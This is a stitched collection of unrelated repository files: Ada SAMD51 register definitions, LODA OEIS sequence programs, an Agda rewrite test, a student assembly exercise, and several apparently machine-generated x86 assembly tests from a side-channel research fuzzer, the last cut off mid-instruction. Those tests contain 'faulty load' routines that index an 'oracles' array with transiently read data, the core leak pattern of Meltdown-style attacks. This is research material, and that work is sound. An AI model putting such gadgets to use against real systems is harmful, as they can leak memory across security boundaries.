.global s_prepare_buffers s_prepare_buffers: push %r14 push %r15 push %r9 push %rax push %rbp push %rdx push %rsi lea addresses_A_ht+0x3cab, %r9 nop sub %rax, %rax movl $0x61626364, (%r9) add $57575, %r15 lea addresses_WC_ht+0x1ed2b, %r15 nop inc %rsi mov (%r15), %r14w and %rbp, %rbp lea addresses_UC_ht+0x19b6b, %rbp nop nop nop nop nop and $37769, %rdx movb (%rbp), %al nop nop xor $7605, %r14 lea addresses_A_ht+0x14959, %rax nop nop mfence mov (%rax), %rsi nop nop dec %r14 lea addresses_WC_ht+0xe72b, %rsi clflush (%rsi) cmp %r15, %r15 mov $0x6162636465666768, %r14 movq %r14, %xmm2 movups %xmm2, (%rsi) nop add $40385, %rax lea addresses_A_ht+0x2eeb, %rdx nop nop nop and %r14, %r14 mov (%rdx), %r9d nop nop cmp $27275, %r15 lea addresses_WC_ht+0x1b75b, %rdx nop xor %rax, %rax mov $0x6162636465666768, %r15 movq %r15, %xmm0 vmovups %ymm0, (%rdx) nop and %r9, %r9 lea addresses_A_ht+0x4a2b, %rsi cmp $16221, %r14 mov (%rsi), %ax nop nop nop nop nop cmp $63801, %r14 lea addresses_normal_ht+0x1e16b, %rbp nop and $33008, %r15 mov $0x6162636465666768, %r9 movq %r9, %xmm7 vmovups %ymm7, (%rbp) nop add %rsi, %rsi lea addresses_UC_ht+0x1326b, %r9 nop add %rsi, %rsi mov (%r9), %rdx nop nop nop sub %rax, %rax lea addresses_normal_ht+0x1ecab, %r15 add $43418, %rax mov (%r15), %rdx cmp %rsi, %rsi pop %rsi pop %rdx pop %rbp pop %rax pop %r9 pop %r15 pop %r14 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r13 push %r9 push %rbp push %rbx push %rsi // Store lea addresses_US+0x10fcb, %r13 nop xor $24563, %r9 movw $0x5152, (%r13) nop nop nop xor %r10, %r10 // Faulty Load lea addresses_WT+0xecab, %rbx and $55445, %r12 mov (%rbx), %r13w lea oracles, %rbp and $0xff, %r13 shlq $12, %r13 mov (%rbp,%r13,1), %r13 pop %rsi pop %rbx pop %rbp pop %r9 pop %r13 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_WT', 'AVXalign': False, 'congruent': 0, 'size': 16, 'same': False, 'NT': True}} {'OP': 'STOR', 'dst': {'type': 'addresses_US', 'AVXalign': False, 'congruent': 3, 'size': 2, 'same': False, 'NT': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_WT', 'AVXalign': False, 'congruent': 0, 'size': 2, 'same': True, 'NT': False}} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 11, 'size': 4, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 6, 'size': 2, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_UC_ht', 'AVXalign': False, 'congruent': 4, 'size': 1, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': False, 'NT': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 5, 'size': 16, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 4, 'size': 4, 'same': False, 'NT': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 4, 'size': 32, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 7, 'size': 2, 'same': True, 'NT': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'AVXalign': False, 'congruent': 5, 'size': 32, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_UC_ht', 'AVXalign': False, 'congruent': 1, 'size': 8, 'same': True, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'congruent': 11, 'size': 8, 'same': False, 'NT': True}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 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src/svd/sam_svd-evsys.ads

Fabien-Chouteau/samd51-hal

1

8340

<reponame>Fabien-Chouteau/samd51-hal pragma Style_Checks (Off); -- This spec has been automatically generated from ATSAMD51G19A.svd pragma Restrictions (No_Elaboration_Code); with HAL; with System; package SAM_SVD.EVSYS is pragma Preelaborate; --------------- -- Registers -- --------------- -- Control type EVSYS_CTRLA_Register is record -- Software Reset SWRST : Boolean := False; -- unspecified Reserved_1_7 : HAL.UInt7 := 16#0#; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CTRLA_Register use record SWRST at 0 range 0 .. 0; Reserved_1_7 at 0 range 1 .. 7; end record; -- EVSYS_SWEVT_CHANNEL array type EVSYS_SWEVT_CHANNEL_Field_Array is array (0 .. 31) of Boolean with Component_Size => 1, Size => 32; -- Software Event type EVSYS_SWEVT_Register (As_Array : Boolean := False) is record case As_Array is when False => -- CHANNEL as a value Val : HAL.UInt32; when True => -- CHANNEL as an array Arr : EVSYS_SWEVT_CHANNEL_Field_Array; end case; end record with Unchecked_Union, Size => 32, Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_SWEVT_Register use record Val at 0 range 0 .. 31; Arr at 0 range 0 .. 31; end record; subtype EVSYS_PRICTRL_PRI_Field is HAL.UInt4; -- Priority Control type EVSYS_PRICTRL_Register is record -- Channel Priority Number PRI : EVSYS_PRICTRL_PRI_Field := 16#0#; -- unspecified Reserved_4_6 : HAL.UInt3 := 16#0#; -- Round-Robin Scheduling Enable RREN : Boolean := False; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_PRICTRL_Register use record PRI at 0 range 0 .. 3; Reserved_4_6 at 0 range 4 .. 6; RREN at 0 range 7 .. 7; end record; subtype EVSYS_INTPEND_ID_Field is HAL.UInt4; -- Channel Pending Interrupt type EVSYS_INTPEND_Register is record -- Channel ID ID : EVSYS_INTPEND_ID_Field := 16#0#; -- unspecified Reserved_4_7 : HAL.UInt4 := 16#0#; -- Channel Overrun OVR : Boolean := False; -- Channel Event Detected EVD : Boolean := False; -- unspecified Reserved_10_13 : HAL.UInt4 := 16#0#; -- Ready READY : Boolean := True; -- Busy BUSY : Boolean := False; end record with Volatile_Full_Access, Object_Size => 16, Bit_Order => System.Low_Order_First; for EVSYS_INTPEND_Register use record ID at 0 range 0 .. 3; Reserved_4_7 at 0 range 4 .. 7; OVR at 0 range 8 .. 8; EVD at 0 range 9 .. 9; Reserved_10_13 at 0 range 10 .. 13; READY at 0 range 14 .. 14; BUSY at 0 range 15 .. 15; end record; -- EVSYS_INTSTATUS_CHINT array type EVSYS_INTSTATUS_CHINT_Field_Array is array (0 .. 11) of Boolean with Component_Size => 1, Size => 12; -- Type definition for EVSYS_INTSTATUS_CHINT type EVSYS_INTSTATUS_CHINT_Field (As_Array : Boolean := False) is record case As_Array is when False => -- CHINT as a value Val : HAL.UInt12; when True => -- CHINT as an array Arr : EVSYS_INTSTATUS_CHINT_Field_Array; end case; end record with Unchecked_Union, Size => 12; for EVSYS_INTSTATUS_CHINT_Field use record Val at 0 range 0 .. 11; Arr at 0 range 0 .. 11; end record; -- Interrupt Status type EVSYS_INTSTATUS_Register is record -- Read-only. Channel 0 Pending Interrupt CHINT : EVSYS_INTSTATUS_CHINT_Field; -- unspecified Reserved_12_31 : HAL.UInt20; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_INTSTATUS_Register use record CHINT at 0 range 0 .. 11; Reserved_12_31 at 0 range 12 .. 31; end record; -- EVSYS_BUSYCH_BUSYCH array type EVSYS_BUSYCH_BUSYCH_Field_Array is array (0 .. 11) of Boolean with Component_Size => 1, Size => 12; -- Type definition for EVSYS_BUSYCH_BUSYCH type EVSYS_BUSYCH_BUSYCH_Field (As_Array : Boolean := False) is record case As_Array is when False => -- BUSYCH as a value Val : HAL.UInt12; when True => -- BUSYCH as an array Arr : EVSYS_BUSYCH_BUSYCH_Field_Array; end case; end record with Unchecked_Union, Size => 12; for EVSYS_BUSYCH_BUSYCH_Field use record Val at 0 range 0 .. 11; Arr at 0 range 0 .. 11; end record; -- Busy Channels type EVSYS_BUSYCH_Register is record -- Read-only. Busy Channel 0 BUSYCH : EVSYS_BUSYCH_BUSYCH_Field; -- unspecified Reserved_12_31 : HAL.UInt20; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_BUSYCH_Register use record BUSYCH at 0 range 0 .. 11; Reserved_12_31 at 0 range 12 .. 31; end record; -- EVSYS_READYUSR_READYUSR array type EVSYS_READYUSR_READYUSR_Field_Array is array (0 .. 11) of Boolean with Component_Size => 1, Size => 12; -- Type definition for EVSYS_READYUSR_READYUSR type EVSYS_READYUSR_READYUSR_Field (As_Array : Boolean := False) is record case As_Array is when False => -- READYUSR as a value Val : HAL.UInt12; when True => -- READYUSR as an array Arr : EVSYS_READYUSR_READYUSR_Field_Array; end case; end record with Unchecked_Union, Size => 12; for EVSYS_READYUSR_READYUSR_Field use record Val at 0 range 0 .. 11; Arr at 0 range 0 .. 11; end record; -- Ready Users type EVSYS_READYUSR_Register is record -- Read-only. Ready User for Channel 0 READYUSR : EVSYS_READYUSR_READYUSR_Field; -- unspecified Reserved_12_31 : HAL.UInt20; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_READYUSR_Register use record READYUSR at 0 range 0 .. 11; Reserved_12_31 at 0 range 12 .. 31; end record; --------------------------------------- -- EVSYS_CHANNEL cluster's Registers -- --------------------------------------- subtype EVSYS_CHANNEL_EVSYS_CHANNEL_EVGEN_Field is HAL.UInt7; -- Path Selection type CHANNEL_PATHSelect is (-- Synchronous path SYNCHRONOUS, -- Resynchronized path RESYNCHRONIZED, -- Asynchronous path ASYNCHRONOUS) with Size => 2; for CHANNEL_PATHSelect use (SYNCHRONOUS => 0, RESYNCHRONIZED => 1, ASYNCHRONOUS => 2); -- Edge Detection Selection type CHANNEL_EDGSELSelect is (-- No event output when using the resynchronized or synchronous path NO_EVT_OUTPUT, -- Event detection only on the rising edge of the signal from the event -- generator when using the resynchronized or synchronous path RISING_EDGE, -- Event detection only on the falling edge of the signal from the event -- generator when using the resynchronized or synchronous path FALLING_EDGE, -- Event detection on rising and falling edges of the signal from the event -- generator when using the resynchronized or synchronous path BOTH_EDGES) with Size => 2; for CHANNEL_EDGSELSelect use (NO_EVT_OUTPUT => 0, RISING_EDGE => 1, FALLING_EDGE => 2, BOTH_EDGES => 3); -- Channel n Control type EVSYS_CHANNEL_EVSYS_CHANNEL_Register is record -- Event Generator Selection EVGEN : EVSYS_CHANNEL_EVSYS_CHANNEL_EVGEN_Field := 16#0#; -- unspecified Reserved_7_7 : HAL.Bit := 16#0#; -- Path Selection PATH : CHANNEL_PATHSelect := SAM_SVD.EVSYS.SYNCHRONOUS; -- Edge Detection Selection EDGSEL : CHANNEL_EDGSELSelect := SAM_SVD.EVSYS.NO_EVT_OUTPUT; -- unspecified Reserved_12_13 : HAL.UInt2 := 16#0#; -- Run in standby RUNSTDBY : Boolean := False; -- Generic Clock On Demand ONDEMAND : Boolean := True; -- unspecified Reserved_16_31 : HAL.UInt16 := 16#0#; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_CHANNEL_EVSYS_CHANNEL_Register use record EVGEN at 0 range 0 .. 6; Reserved_7_7 at 0 range 7 .. 7; PATH at 0 range 8 .. 9; EDGSEL at 0 range 10 .. 11; Reserved_12_13 at 0 range 12 .. 13; RUNSTDBY at 0 range 14 .. 14; ONDEMAND at 0 range 15 .. 15; Reserved_16_31 at 0 range 16 .. 31; end record; -- Channel n Interrupt Enable Clear type EVSYS_CHINTENCLR_EVSYS_CHANNEL_Register is record -- Channel Overrun Interrupt Disable OVR : Boolean := False; -- Channel Event Detected Interrupt Disable EVD : Boolean := False; -- unspecified Reserved_2_7 : HAL.UInt6 := 16#0#; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHINTENCLR_EVSYS_CHANNEL_Register use record OVR at 0 range 0 .. 0; EVD at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; -- Channel n Interrupt Enable Set type EVSYS_CHINTENSET_EVSYS_CHANNEL_Register is record -- Channel Overrun Interrupt Enable OVR : Boolean := False; -- Channel Event Detected Interrupt Enable EVD : Boolean := False; -- unspecified Reserved_2_7 : HAL.UInt6 := 16#0#; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHINTENSET_EVSYS_CHANNEL_Register use record OVR at 0 range 0 .. 0; EVD at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; -- Channel n Interrupt Flag Status and Clear type EVSYS_CHINTFLAG_EVSYS_CHANNEL_Register is record -- Channel Overrun OVR : Boolean := False; -- Channel Event Detected EVD : Boolean := False; -- unspecified Reserved_2_7 : HAL.UInt6 := 16#0#; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHINTFLAG_EVSYS_CHANNEL_Register use record OVR at 0 range 0 .. 0; EVD at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; -- Channel n Status type EVSYS_CHSTATUS_EVSYS_CHANNEL_Register is record -- Read-only. Ready User RDYUSR : Boolean; -- Read-only. Busy Channel BUSYCH : Boolean; -- unspecified Reserved_2_7 : HAL.UInt6; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHSTATUS_EVSYS_CHANNEL_Register use record RDYUSR at 0 range 0 .. 0; BUSYCH at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; type EVSYS_CHANNEL_Cluster is record -- Channel n Control CHANNEL : aliased EVSYS_CHANNEL_EVSYS_CHANNEL_Register; -- Channel n Interrupt Enable Clear CHINTENCLR : aliased EVSYS_CHINTENCLR_EVSYS_CHANNEL_Register; -- Channel n Interrupt Enable Set CHINTENSET : aliased EVSYS_CHINTENSET_EVSYS_CHANNEL_Register; -- Channel n Interrupt Flag Status and Clear CHINTFLAG : aliased EVSYS_CHINTFLAG_EVSYS_CHANNEL_Register; -- Channel n Status CHSTATUS : aliased EVSYS_CHSTATUS_EVSYS_CHANNEL_Register; end record with Size => 64; for EVSYS_CHANNEL_Cluster use record CHANNEL at 16#0# range 0 .. 31; CHINTENCLR at 16#4# range 0 .. 7; CHINTENSET at 16#5# range 0 .. 7; CHINTFLAG at 16#6# range 0 .. 7; CHSTATUS at 16#7# range 0 .. 7; end record; type EVSYS_CHANNEL_Clusters is array (0 .. 31) of EVSYS_CHANNEL_Cluster; subtype EVSYS_USER_CHANNEL_Field is HAL.UInt6; -- User Multiplexer n type EVSYS_USER_Register is record -- Channel Event Selection CHANNEL : EVSYS_USER_CHANNEL_Field := 16#0#; -- unspecified Reserved_6_31 : HAL.UInt26 := 16#0#; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_USER_Register use record CHANNEL at 0 range 0 .. 5; Reserved_6_31 at 0 range 6 .. 31; end record; -- User Multiplexer n type EVSYS_USER_Registers is array (0 .. 66) of EVSYS_USER_Register; ----------------- -- Peripherals -- ----------------- -- Event System Interface type EVSYS_Peripheral is record -- Control CTRLA : aliased EVSYS_CTRLA_Register; -- Software Event SWEVT : aliased EVSYS_SWEVT_Register; -- Priority Control PRICTRL : aliased EVSYS_PRICTRL_Register; -- Channel Pending Interrupt INTPEND : aliased EVSYS_INTPEND_Register; -- Interrupt Status INTSTATUS : aliased EVSYS_INTSTATUS_Register; -- Busy Channels BUSYCH : aliased EVSYS_BUSYCH_Register; -- Ready Users READYUSR : aliased EVSYS_READYUSR_Register; EVSYS_CHANNEL : aliased EVSYS_CHANNEL_Clusters; -- User Multiplexer n USER : aliased EVSYS_USER_Registers; end record with Volatile; for EVSYS_Peripheral use record CTRLA at 16#0# range 0 .. 7; SWEVT at 16#4# range 0 .. 31; PRICTRL at 16#8# range 0 .. 7; INTPEND at 16#10# range 0 .. 15; INTSTATUS at 16#14# range 0 .. 31; BUSYCH at 16#18# range 0 .. 31; READYUSR at 16#1C# range 0 .. 31; EVSYS_CHANNEL at 16#20# range 0 .. 2047; USER at 16#120# range 0 .. 2143; end record; -- Event System Interface EVSYS_Periph : aliased EVSYS_Peripheral with Import, Address => EVSYS_Base; end SAM_SVD.EVSYS;

programs/oeis/112/A112689.asm

neoneye/loda

22

86568

<reponame>neoneye/loda ; A112689: A modified Chebyshev transform of the Jacobsthal numbers. ; 0,1,1,0,1,2,1,1,2,2,2,2,2,3,3,2,3,4,3,3,4,4,4,4,4,5,5,4,5,6,5,5,6,6,6,6,6,7,7,6,7,8,7,7,8,8,8,8,8,9,9,8,9,10,9,9,10,10,10,10,10,11,11,10,11,12,11,11,12,12,12,12,12,13,13,12,13,14,13,13,14,14,14,14,14,15,15,14,15,16,15,15,16,16,16,16,16,17,17,16 mul $0,2 lpb $0 mov $2,$0 trn $0,8 mod $2,6 mov $3,$2 min $3,1 add $1,$3 lpe mov $0,$1

test/Succeed/Issue1550.agda

alhassy/agda

3

984

-- Andreas, 2015-08-27 Allow rewrite rules for symbols defined in other file {-# OPTIONS --rewriting #-} open import Common.Nat open import Common.Equality {-# BUILTIN REWRITE _≡_ #-} x+0 : ∀ x → x + 0 ≡ x x+0 zero = refl x+0 (suc x) rewrite x+0 x = refl {-# REWRITE x+0 #-} -- adding rewrite rule for + is ok x+0+0 : ∀{x} → (x + 0) + 0 ≡ x x+0+0 = refl

previous.applescript

BrianAker/mediaPlugin

0

4716

tell application "iTunes" to play (previous track)

Transynther/x86/_processed/AVXALIGN/_ht_zr_/i7-7700_9_0xca.log_21829_576.asm

ljhsiun2/medusa

9

85568

<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %r8 push %r9 push %rax push %rcx push %rdi push %rsi lea addresses_WT_ht+0x20b4, %rcx nop nop nop cmp %r14, %r14 mov $0x6162636465666768, %r9 movq %r9, %xmm4 movups %xmm4, (%rcx) xor $8579, %rax lea addresses_normal_ht+0x3f14, %rsi nop nop xor %rax, %rax mov (%rsi), %r8w nop add %r8, %r8 lea addresses_normal_ht+0x32f4, %rsi lea addresses_normal_ht+0x7adc, %rdi nop nop nop cmp $37495, %r8 mov $62, %rcx rep movsw nop sub %rax, %rax lea addresses_A_ht+0x17334, %r14 sub %rdi, %rdi vmovups (%r14), %ymm5 vextracti128 $1, %ymm5, %xmm5 vpextrq $0, %xmm5, %rsi xor $25287, %r8 lea addresses_UC_ht+0x5d99, %rax nop nop nop add %r14, %r14 movb (%rax), %r9b nop nop sub %rax, %rax lea addresses_UC_ht+0x9334, %r14 nop nop sub $25717, %rsi and $0xffffffffffffffc0, %r14 movaps (%r14), %xmm0 vpextrq $0, %xmm0, %rcx add %r14, %r14 lea addresses_UC_ht+0x1cc04, %rsi lea addresses_UC_ht+0x1e704, %rdi clflush (%rsi) nop dec %r12 mov $120, %rcx rep movsw nop nop xor %rax, %rax lea addresses_A_ht+0x11534, %rsi lea addresses_WT_ht+0x11764, %rdi nop nop nop nop add $44195, %r9 mov $71, %rcx rep movsw nop nop nop nop sub $24050, %r8 lea addresses_normal_ht+0x1e8e8, %rsi lea addresses_A_ht+0x12f4, %rdi nop cmp $20934, %r12 mov $21, %rcx rep movsb mfence pop %rsi pop %rdi pop %rcx pop %rax pop %r9 pop %r8 pop %r14 pop %r12 ret .global s_faulty_load s_faulty_load: push %r10 push %r11 push %r15 push %r8 push %r9 push %rax push %rcx // Load lea addresses_normal+0x1f240, %rcx nop nop nop nop nop sub $42335, %r10 mov (%rcx), %r15d nop nop nop nop sub $43400, %r9 // Faulty Load lea addresses_WT+0x14734, %r11 nop xor $59973, %r8 vmovntdqa (%r11), %ymm6 vextracti128 $1, %ymm6, %xmm6 vpextrq $1, %xmm6, %rax lea oracles, %r15 and $0xff, %rax shlq $12, %rax mov (%r15,%rax,1), %rax pop %rcx pop %rax pop %r9 pop %r8 pop %r15 pop %r11 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 8, 'NT': True, 'type': 'addresses_WT'}, 'OP': 'LOAD'} {'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 4, 'NT': False, 'type': 'addresses_normal'}, 'OP': 'LOAD'} [Faulty Load] {'src': {'congruent': 0, 'AVXalign': False, 'same': True, 'size': 32, 'NT': True, 'type': 'addresses_WT'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'congruent': 3, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_WT_ht'}} {'src': {'congruent': 5, 'AVXalign': False, 'same': True, 'size': 2, 'NT': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 5, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'congruent': 3, 'same': False, 'type': 'addresses_normal_ht'}} {'src': {'congruent': 9, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 1, 'NT': False, 'type': 'addresses_UC_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 8, 'AVXalign': True, 'same': True, 'size': 16, 'NT': False, 'type': 'addresses_UC_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 4, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'congruent': 3, 'same': True, 'type': 'addresses_UC_ht'}} {'src': {'congruent': 7, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'congruent': 4, 'same': False, 'type': 'addresses_WT_ht'}} {'src': {'congruent': 2, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'congruent': 3, 'same': False, 'type': 'addresses_A_ht'}} {'44': 385, '45': 198, '00': 21246} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

L1/TPs/0204-ASM/tp1/pgm2.asm

Tehcam/Studies

0

25420

<reponame>Tehcam/Studies ; Affiche les valeurs contenues dans les 2 premières cases memoire Load Mem[0] Out Load Mem[1] Out ; Sauvegarde la somme des valeurs dans Mem[2] Add Mem[0] Store Mem[2] Out ; Sauvegarde le produit des valeurs dans Mem[3] Load Mem[0] Mul Mem[1] Store Mem[3] Out ; Fin du programme End

oeis/076/A076740.asm

neoneye/loda-programs

11

312

; A076740: a(0)=0, a(1)=1, a(n)=2*a(n-1)^2-a(n-2)^2. ; Submitted by <NAME> ; 0,1,2,7,94,17623,621131422,771608486480914039,1190759312818733806192492198418844958,2835815482129086304432303489823255992516794878843873643408264712776750007 lpb $0 sub $0,1 pow $2,2 sub $2,$1 add $1,$2 add $1,1 add $2,$1 lpe mov $0,$2

Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2_notsx.log_143_1517.asm

ljhsiun2/medusa

9

170868

.global s_prepare_buffers s_prepare_buffers: push %r11 push %r14 push %r8 push %rbp push %rbx push %rdx push %rsi lea addresses_WT_ht+0xef14, %r11 nop nop nop cmp $19441, %r8 mov $0x6162636465666768, %rsi movq %rsi, %xmm6 movups %xmm6, (%r11) nop nop nop nop nop cmp %rbx, %rbx lea addresses_normal_ht+0xc6d4, %rbx clflush (%rbx) nop nop nop xor %r14, %r14 mov (%rbx), %r8 nop nop nop nop nop and $4881, %r14 lea addresses_A_ht+0xa894, %rdx nop nop nop nop nop and %rbp, %rbp mov (%rdx), %r11d xor $59364, %rsi lea addresses_D_ht+0x1d324, %r11 nop nop add %rdx, %rdx mov $0x6162636465666768, %rsi movq %rsi, (%r11) nop nop add $25692, %r8 lea addresses_D_ht+0xf094, %r11 nop nop nop nop nop xor $23876, %r8 vmovups (%r11), %ymm2 vextracti128 $1, %ymm2, %xmm2 vpextrq $0, %xmm2, %rbp nop nop nop xor %rdx, %rdx lea addresses_A_ht+0x183ac, %rbp nop nop and $57858, %rsi movb (%rbp), %r8b xor %rbx, %rbx lea addresses_WT_ht+0x3a14, %r11 nop nop nop add %rdx, %rdx mov $0x6162636465666768, %rsi movq %rsi, %xmm3 movups %xmm3, (%r11) nop nop nop nop nop add $12109, %rdx lea addresses_WC_ht+0x1dda6, %r14 nop nop nop add %rsi, %rsi mov $0x6162636465666768, %r8 movq %r8, %xmm2 vmovups %ymm2, (%r14) nop nop sub $34001, %r11 pop %rsi pop %rdx pop %rbx pop %rbp pop %r8 pop %r14 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r8 push %rax push %rcx push %rdi push %rsi // Store lea addresses_A+0x1ec94, %r10 nop nop nop nop nop add $45772, %r8 movw $0x5152, (%r10) nop nop nop and $49946, %rsi // Store lea addresses_D+0xec94, %r8 nop nop nop nop add $3231, %rax movw $0x5152, (%r8) nop nop nop xor $35630, %rdi // Store lea addresses_PSE+0x7a94, %r10 nop xor $25798, %r8 movl $0x51525354, 